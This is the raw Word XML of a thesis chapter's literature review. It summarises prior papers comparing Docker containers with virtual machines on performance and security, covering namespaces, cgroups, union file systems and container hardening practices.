    <w:p w14:paraId="1A4E388E" w14:textId="77777777" w:rsidR="00CA05D7" w:rsidRDefault="00CA05D7" w:rsidP="00CB686E"/>
    <w:p w14:paraId="4C3EE433" w14:textId="05E015B1" w:rsidR="00120C05" w:rsidRDefault="004E503A" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc87032907"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00AE3406">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005434F9">
        <w:t>RELATED WORK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="00ACD815" w14:textId="628F31F1" w:rsidR="003C2A96" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc87032908"/>
      <w:r>
        <w:t>OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="030B7EEB" w14:textId="5D2E0361" w:rsidR="004834C1" w:rsidRPr="004834C1" w:rsidRDefault="00EC514E" w:rsidP="004834C1">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="00E41ED8">
        <w:t xml:space="preserve">aims to provide a comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="00AE51A4">
        <w:t xml:space="preserve">literature review on </w:t>
      </w:r>
      <w:r w:rsidR="00CD2685">
        <w:t xml:space="preserve">various </w:t>
      </w:r>
      <w:r w:rsidR="00A82498">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00CD2685">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0086403D">
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="00CD2685">
        <w:t xml:space="preserve"> on Docker </w:t>
      </w:r>
      <w:r w:rsidR="00D77A9D">
        <w:t xml:space="preserve">components based </w:t>
      </w:r>
      <w:r w:rsidR="00FB7266">
        <w:t xml:space="preserve">upon previous related </w:t>
      </w:r>
      <w:r w:rsidR="0080561B">
        <w:t xml:space="preserve">or similar </w:t>
      </w:r>
      <w:r w:rsidR="00F57B8A">
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="001807FA">
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="001F6639">
        <w:t>should</w:t>
      </w:r>
      <w:r w:rsidR="00DA72B0">
        <w:t xml:space="preserve"> help the </w:t>
      </w:r>
      <w:r w:rsidR="008774A3">
        <w:t>researcher</w:t>
      </w:r>
      <w:r w:rsidR="00DA72B0">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="001F6639">
        <w:t xml:space="preserve">conduct </w:t>
      </w:r>
      <w:r w:rsidR="00967AAB">
        <w:t>various security attacks on Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00E7134C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F47D73">
        <w:t xml:space="preserve"> This section will</w:t>
      </w:r>
      <w:r w:rsidR="00612200">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D7058">
        <w:t>investigate</w:t>
      </w:r>
      <w:r w:rsidR="00831F4A">
        <w:t xml:space="preserve"> and contemplate</w:t>
      </w:r>
      <w:r w:rsidR="003826E1">
        <w:t xml:space="preserve"> the methods,</w:t>
      </w:r>
      <w:r w:rsidR="00B04D60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF348E">
        <w:t>approaches</w:t>
      </w:r>
      <w:r w:rsidR="005B6C9A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00343C8E">
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidR="00FA4420">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00343C8E">
        <w:t xml:space="preserve"> and tools used to </w:t>
      </w:r>
      <w:r w:rsidR="00631CA1">
        <w:t>produce</w:t>
      </w:r>
      <w:r w:rsidR="00C5645E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C2358E">
        <w:t>similar</w:t>
      </w:r>
      <w:r w:rsidR="00C5645E">
        <w:t xml:space="preserve"> projects</w:t>
      </w:r>
      <w:r w:rsidR="00631CA1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00722509">
        <w:t xml:space="preserve"> The research </w:t>
      </w:r>
      <w:r w:rsidR="005875CA">
        <w:t xml:space="preserve">process is organised </w:t>
      </w:r>
      <w:r w:rsidR="004207F1">
        <w:t xml:space="preserve">into groups based </w:t>
      </w:r>
      <w:r w:rsidR="008E077A">
        <w:t xml:space="preserve">upon </w:t>
      </w:r>
      <w:r w:rsidR="009320F1">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B52FDE">
        <w:t>security attacks on Docker components</w:t>
      </w:r>
      <w:r w:rsidR="00A848D5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003235BA">
        <w:t xml:space="preserve"> Therefore</w:t>
      </w:r>
      <w:r w:rsidR="00402780">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003E2BEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00402780">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003E2BEC">
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="00720431">
        <w:t>chapter</w:t>
      </w:r>
      <w:r w:rsidR="003E2BEC">
        <w:t xml:space="preserve"> will help the author to </w:t>
      </w:r>
      <w:r w:rsidR="00E97FDA">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="003235BA">
        <w:t>better understanding on the security aspect of Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="003A5E4F">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00B64066">
        <w:t xml:space="preserve">reviewing and analysing </w:t>
      </w:r>
      <w:r w:rsidR="00957D93">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00B64066">
        <w:t xml:space="preserve"> these </w:t>
      </w:r>
      <w:r w:rsidR="0025005D">
        <w:t xml:space="preserve">related </w:t>
      </w:r>
      <w:r w:rsidR="00D562ED">
        <w:t xml:space="preserve">topics </w:t>
      </w:r>
      <w:r w:rsidR="00A24048">
        <w:t xml:space="preserve">will assist </w:t>
      </w:r>
      <w:r w:rsidR="00056302">
        <w:t xml:space="preserve">the author </w:t>
      </w:r>
      <w:r w:rsidR="00730011">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00056302">
        <w:t>develop</w:t>
      </w:r>
      <w:r w:rsidR="00730011">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00056302">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F10F7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00385970">
        <w:t xml:space="preserve">project’s </w:t>
      </w:r>
      <w:r w:rsidR="0085222C">
        <w:t>aims and objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBED4B" w14:textId="3D367124" w:rsidR="003C2A96" w:rsidRDefault="00665E38" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc87032909"/>
      <w:r>
        <w:t>LITERATURE REVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="388E9B95" w14:textId="1F46B10B" w:rsidR="004834C1" w:rsidRDefault="000F58CD" w:rsidP="000F58CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc87032910"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="000A1C7F">
        <w:t>onta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iner vs </w:t>
      </w:r>
      <w:r w:rsidR="005D590B">
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>irtualisation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="64FE379A" w14:textId="64CC4BBC" w:rsidR="007B655A" w:rsidRDefault="008E5DF0" w:rsidP="007B655A">
      <w:r>
        <w:t xml:space="preserve">The researchers in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1174718453"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F42F69">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F42F69">
            <w:instrText xml:space="preserve"> CITATION GIR19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F42F69">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[70]</w:t>
          </w:r>
          <w:r w:rsidR="00F42F69">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BB52BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80EBD">
        <w:t>provided</w:t>
      </w:r>
      <w:r w:rsidR="009A6786">
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="00D80EBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A54CC">
        <w:t>in-depth</w:t>
      </w:r>
      <w:r w:rsidR="00B919D4">
        <w:t xml:space="preserve"> comparative analysis </w:t>
      </w:r>
      <w:r w:rsidR="00811D6C">
        <w:t xml:space="preserve">between </w:t>
      </w:r>
      <w:r w:rsidR="003652FE">
        <w:t xml:space="preserve">virtualisation </w:t>
      </w:r>
      <w:r w:rsidR="00094266">
        <w:t>and containers</w:t>
      </w:r>
      <w:r w:rsidR="009A164B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00330A40">
        <w:t>with regards to</w:t>
      </w:r>
      <w:r w:rsidR="009A164B">
        <w:t xml:space="preserve"> perfo</w:t>
      </w:r>
      <w:r w:rsidR="007316CE">
        <w:t xml:space="preserve">rmance </w:t>
      </w:r>
      <w:r w:rsidR="00F86669">
        <w:t xml:space="preserve">for processing big data </w:t>
      </w:r>
      <w:r w:rsidR="00620E21">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00A6209D">
        <w:t>cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00094266">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00114578">
        <w:t xml:space="preserve"> This paper</w:t>
      </w:r>
      <w:r w:rsidR="000D2C2C">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="000C087A">
        <w:t>a multipurpose</w:t>
      </w:r>
      <w:r w:rsidR="0076052E">
        <w:t xml:space="preserve"> study </w:t>
      </w:r>
      <w:r w:rsidR="006823C1">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00DA7B25">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="008C1AD7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DD0032">
        <w:t>discussing container</w:t>
      </w:r>
      <w:r w:rsidR="00490CC5">
        <w:t xml:space="preserve">s architecture, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E66F45">
        <w:t>pros</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E66F45">
        <w:t xml:space="preserve"> and cons</w:t>
      </w:r>
      <w:r w:rsidR="008F4099">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A0B03">
        <w:t xml:space="preserve"> The comp</w:t>
      </w:r>
      <w:r w:rsidR="00D44CC2">
        <w:t>arison is made</w:t>
      </w:r>
      <w:r w:rsidR="002826D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130136">
        <w:t>on various methodologies and metrics</w:t>
      </w:r>
      <w:r w:rsidR="00104D23">
        <w:t xml:space="preserve">, including hardware cost, portability, </w:t>
      </w:r>
      <w:r w:rsidR="00EB72F4">
        <w:t xml:space="preserve">scalability, performance, </w:t>
      </w:r>
      <w:r w:rsidR="000437B1">
        <w:t>reliability, isolation</w:t>
      </w:r>
      <w:r w:rsidR="00FF0C71">
        <w:t>, security</w:t>
      </w:r>
      <w:r w:rsidR="00D86907">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FF0C71">
        <w:t xml:space="preserve"> and others.</w:t>
      </w:r>
      <w:r w:rsidR="00E24C1E">
        <w:t xml:space="preserve"> The article concludes </w:t>
      </w:r>
      <w:r w:rsidR="003F4AA6">
        <w:t xml:space="preserve">that containers </w:t>
      </w:r>
      <w:r w:rsidR="007A577B">
        <w:t>are vul</w:t>
      </w:r>
      <w:r w:rsidR="00420168">
        <w:t>nerable to more attacks</w:t>
      </w:r>
      <w:r w:rsidR="009839A8">
        <w:t xml:space="preserve"> than VM</w:t>
      </w:r>
      <w:r w:rsidR="00420168">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B62CAD">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="009839A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B62CAD">
        <w:t xml:space="preserve">provide </w:t>
      </w:r>
      <w:r w:rsidR="00145836">
        <w:t>weaker isolation</w:t>
      </w:r>
      <w:r w:rsidR="003E6075">
        <w:t xml:space="preserve"> and shared resources</w:t>
      </w:r>
      <w:r w:rsidR="001C56C0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A4BBF">
        <w:t>increasing the security issues</w:t>
      </w:r>
      <w:r w:rsidR="001C56C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E70F3">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00417A86">
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidR="00310888">
        <w:t xml:space="preserve"> comparison </w:t>
      </w:r>
      <w:r w:rsidR="00810545">
        <w:t xml:space="preserve">focuses more on performance </w:t>
      </w:r>
      <w:r w:rsidR="008D7457">
        <w:t xml:space="preserve">than </w:t>
      </w:r>
      <w:r w:rsidR="00674EB8">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00CB7474">
        <w:t xml:space="preserve">, and thus </w:t>
      </w:r>
      <w:r w:rsidR="009B5A68">
        <w:t xml:space="preserve">the security </w:t>
      </w:r>
      <w:r w:rsidR="007C1374">
        <w:t xml:space="preserve">concept </w:t>
      </w:r>
      <w:r w:rsidR="00EC5304">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00EC74CD">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="007C1374">
        <w:t xml:space="preserve">is only mentioned </w:t>
      </w:r>
      <w:r w:rsidR="006C0813">
        <w:t>for comparison without</w:t>
      </w:r>
      <w:r w:rsidR="00A458B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471EDF">
        <w:t xml:space="preserve">providing </w:t>
      </w:r>
      <w:r w:rsidR="00A458B9">
        <w:t>a detailed explanation.</w:t>
      </w:r>
      <w:r w:rsidR="004E70F3">
        <w:t xml:space="preserve"> However, t</w:t>
      </w:r>
      <w:r w:rsidR="00656517">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="008D1AC6">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00BD13AE">
        <w:t xml:space="preserve">paper </w:t>
      </w:r>
      <w:r w:rsidR="00A52E50">
        <w:t>reviewed</w:t>
      </w:r>
      <w:r w:rsidR="00850995">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A870EC">
        <w:t xml:space="preserve">the concept of Docker containers </w:t>
      </w:r>
      <w:r w:rsidR="00603EB3">
        <w:t xml:space="preserve">meticulously </w:t>
      </w:r>
      <w:r w:rsidR="00CC6C19">
        <w:t>and br</w:t>
      </w:r>
      <w:r w:rsidR="00810722">
        <w:t>iefly</w:t>
      </w:r>
      <w:r w:rsidR="008773D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00317F0D">
        <w:t>and provide</w:t>
      </w:r>
      <w:r w:rsidR="005C0BBD">
        <w:t>d a</w:t>
      </w:r>
      <w:r w:rsidR="00317F0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D78A2">
        <w:t xml:space="preserve">credible and </w:t>
      </w:r>
      <w:r w:rsidR="005C0BBD">
        <w:t>significant</w:t>
      </w:r>
      <w:r w:rsidR="003527BF">
        <w:t xml:space="preserve"> reference count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB756E0" w14:textId="54E57DC6" w:rsidR="00B63069" w:rsidRDefault="006A6DEC" w:rsidP="007B655A">
      <w:r>
        <w:t>An i</w:t>
      </w:r>
      <w:r w:rsidR="001E5C59">
        <w:t xml:space="preserve">n-depth </w:t>
      </w:r>
      <w:r w:rsidR="00B86ADC">
        <w:t>comp</w:t>
      </w:r>
      <w:r w:rsidR="00225B8B">
        <w:t xml:space="preserve">arative </w:t>
      </w:r>
      <w:r w:rsidR="001E5C59">
        <w:t xml:space="preserve">analysis </w:t>
      </w:r>
      <w:r w:rsidR="00572DC0">
        <w:t>of Docker security</w:t>
      </w:r>
      <w:r w:rsidR="008B5A76">
        <w:t xml:space="preserve"> in cloud PAAS,</w:t>
      </w:r>
      <w:r w:rsidR="00572DC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00225B8B">
        <w:t>with other container technologies and VM</w:t>
      </w:r>
      <w:r w:rsidR="002E658A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00225B8B">
        <w:t xml:space="preserve"> is presented in</w:t>
      </w:r>
      <w:r w:rsidR="00481047">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-768240041"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00642D46">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00642D46">
            <w:instrText xml:space="preserve"> CITATION ARM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00642D46">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[71]</w:t>
          </w:r>
          <w:r w:rsidR="00642D46">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00642D46">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F6547">
        <w:t xml:space="preserve"> The authors </w:t>
      </w:r>
      <w:r w:rsidR="00812F6B">
        <w:t xml:space="preserve">presented the overview </w:t>
      </w:r>
      <w:r w:rsidR="00692653">
        <w:t>of Docker security using Linux kernel features, including namespaces</w:t>
      </w:r>
      <w:r w:rsidR="00180F58">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00234210">
        <w:t>Cgroups, and the union file systems (UFS).</w:t>
      </w:r>
      <w:r w:rsidR="00F14177">
        <w:t xml:space="preserve"> The UFS </w:t>
      </w:r>
      <w:r w:rsidR="00346B89">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00341B58">
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidR="005D0DC4">
        <w:t>mount</w:t>
      </w:r>
      <w:r w:rsidR="00341B58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00634D7B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00341B58">
        <w:t xml:space="preserve">container’s file system </w:t>
      </w:r>
      <w:r w:rsidR="005D0DC4">
        <w:t>to a virtual file system.</w:t>
      </w:r>
      <w:r w:rsidR="00163E55">
        <w:t xml:space="preserve"> In Docker, n</w:t>
      </w:r>
      <w:r w:rsidR="00514E82">
        <w:t xml:space="preserve">amespaces and Cgroups </w:t>
      </w:r>
      <w:r w:rsidR="00D45BF9">
        <w:t xml:space="preserve">provide isolation and </w:t>
      </w:r>
      <w:r w:rsidR="006B4840">
        <w:t xml:space="preserve">allocation resources </w:t>
      </w:r>
      <w:r w:rsidR="00E82207">
        <w:t>to containers, respectively.</w:t>
      </w:r>
      <w:r w:rsidR="008622B9">
        <w:t xml:space="preserve"> According to the authors</w:t>
      </w:r>
      <w:r w:rsidR="00D212F1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DF5F9B">
        <w:t>Dock</w:t>
      </w:r>
      <w:r w:rsidR="002B61C6">
        <w:t xml:space="preserve">er </w:t>
      </w:r>
      <w:r w:rsidR="00D212F1">
        <w:t xml:space="preserve">kernel features </w:t>
      </w:r>
      <w:r w:rsidR="007A7314">
        <w:t xml:space="preserve">need to </w:t>
      </w:r>
      <w:r w:rsidR="00346B89">
        <w:t>be adequately</w:t>
      </w:r>
      <w:r w:rsidR="007A7314">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350DE">
        <w:t xml:space="preserve">managed and monitored </w:t>
      </w:r>
      <w:r w:rsidR="00615D19">
        <w:t xml:space="preserve">for security </w:t>
      </w:r>
      <w:r w:rsidR="000E44EE">
        <w:t>reasons</w:t>
      </w:r>
      <w:r w:rsidR="009164F8">
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidR="00492ED8">
        <w:t xml:space="preserve">pen testing and compatibility checking </w:t>
      </w:r>
      <w:r w:rsidR="00013861">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="0046470B">
        <w:t>secure containers</w:t>
      </w:r>
      <w:r w:rsidR="00013861">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C961C5">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00346B89">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C961C5">
        <w:t>real live production environment.</w:t>
      </w:r>
      <w:r w:rsidR="00A02763">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A83CD2F" w14:textId="27F224F5" w:rsidR="00CC433E" w:rsidRPr="007B655A" w:rsidRDefault="00A02763" w:rsidP="007B655A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="0060797A">
        <w:t xml:space="preserve"> authors </w:t>
      </w:r>
      <w:r w:rsidR="008640BB">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="004D20A9">
        <w:t>provided</w:t>
      </w:r>
      <w:r w:rsidR="0019343D">
        <w:t xml:space="preserve"> best </w:t>
      </w:r>
      <w:r w:rsidR="00922801">
        <w:t>practices for securing containers</w:t>
      </w:r>
      <w:r w:rsidR="00FB042E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">along with </w:t>
      </w:r>
      <w:r w:rsidR="002471B1">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00DD7D4E">
        <w:t>brief description of its security challenges.</w:t>
      </w:r>
      <w:r w:rsidR="00BE487F">
        <w:t xml:space="preserve"> The research shows that </w:t>
      </w:r>
      <w:r w:rsidR="00A758C9">
        <w:t xml:space="preserve">implementing </w:t>
      </w:r>
      <w:r w:rsidR="00F07A30">
        <w:t>DCT</w:t>
      </w:r>
      <w:r w:rsidR="00806679">
        <w:t xml:space="preserve">, VPN, and SSL </w:t>
      </w:r>
      <w:r w:rsidR="00F3153A">
        <w:t xml:space="preserve">enhances the security </w:t>
      </w:r>
      <w:r w:rsidR="002471B1">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00F3153A">
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r w:rsidR="00F71AC8">
        <w:t xml:space="preserve">, especially </w:t>
      </w:r>
      <w:r w:rsidR="00D93391">
        <w:t xml:space="preserve">when using </w:t>
      </w:r>
      <w:r w:rsidR="002471B1">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D93391">
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidR="007E2CD2">
        <w:t>repository, like Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="00F3153A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C04DBE">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="00596C08">
        <w:t>they</w:t>
      </w:r>
      <w:r w:rsidR="00954C0A">
        <w:t xml:space="preserve"> evaluated and compared Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00C1377B">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00131484">
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="003752DA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA7809">
        <w:t xml:space="preserve"> The comparison </w:t>
      </w:r>
      <w:r w:rsidR="0071436B">
        <w:t>resulted that VM are significantly secure than containers.</w:t>
      </w:r>
      <w:r w:rsidR="00ED7A26">
        <w:t xml:space="preserve"> Lastly, </w:t>
      </w:r>
      <w:r w:rsidR="00601F9B">
        <w:t>they</w:t>
      </w:r>
      <w:r w:rsidR="0056652A">
        <w:t xml:space="preserve"> proposed </w:t>
      </w:r>
      <w:r w:rsidR="00061D1D">
        <w:t xml:space="preserve">a solution for </w:t>
      </w:r>
      <w:r w:rsidR="00B16825">
        <w:t xml:space="preserve">improving </w:t>
      </w:r>
      <w:r w:rsidR="00C850E6">
        <w:t xml:space="preserve">Docker kernel </w:t>
      </w:r>
      <w:r w:rsidR="00CE1057">
        <w:t>security using user namespaces</w:t>
      </w:r>
      <w:r w:rsidR="005029E2">
        <w:t xml:space="preserve"> features</w:t>
      </w:r>
      <w:r w:rsidR="00CE1057">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00735D9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003319F4">
        <w:t xml:space="preserve">The authors conclude </w:t>
      </w:r>
      <w:r w:rsidR="008B33DE">
        <w:t xml:space="preserve">containers inside VM </w:t>
      </w:r>
      <w:r w:rsidR="00780211">
        <w:t xml:space="preserve">provide better security </w:t>
      </w:r>
      <w:r w:rsidR="009F2B2E">
        <w:t>compar</w:t>
      </w:r>
      <w:r w:rsidR="00BD79F2">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009F2B2E">
        <w:t xml:space="preserve"> to containers running on a </w:t>
      </w:r>
      <w:r w:rsidR="00AA1100">
        <w:t>typical host</w:t>
      </w:r>
      <w:r w:rsidR="00D010FB">
        <w:t xml:space="preserve"> but at the cost of performance.</w:t>
      </w:r>
      <w:r w:rsidR="004533D3">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="000D6C52">
        <w:t xml:space="preserve">is article </w:t>
      </w:r>
      <w:r w:rsidR="00314B10">
        <w:t xml:space="preserve">covers </w:t>
      </w:r>
      <w:r w:rsidR="00DF4CFE">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00D02411">
        <w:t xml:space="preserve"> security of Docker </w:t>
      </w:r>
      <w:r w:rsidR="00134984">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00EE58C8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00134984">
        <w:t xml:space="preserve">wide </w:t>
      </w:r>
      <w:r w:rsidR="001411C0">
        <w:t>variety</w:t>
      </w:r>
      <w:r w:rsidR="009A2FDC">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00D01577">
        <w:t>reliable sources briefly</w:t>
      </w:r>
      <w:r w:rsidR="00004394" w:rsidRPr="00004394">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1684006688"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00004394">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00004394">
            <w:instrText xml:space="preserve"> CITATION ARM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00004394">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[71]</w:t>
          </w:r>
          <w:r w:rsidR="00004394">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
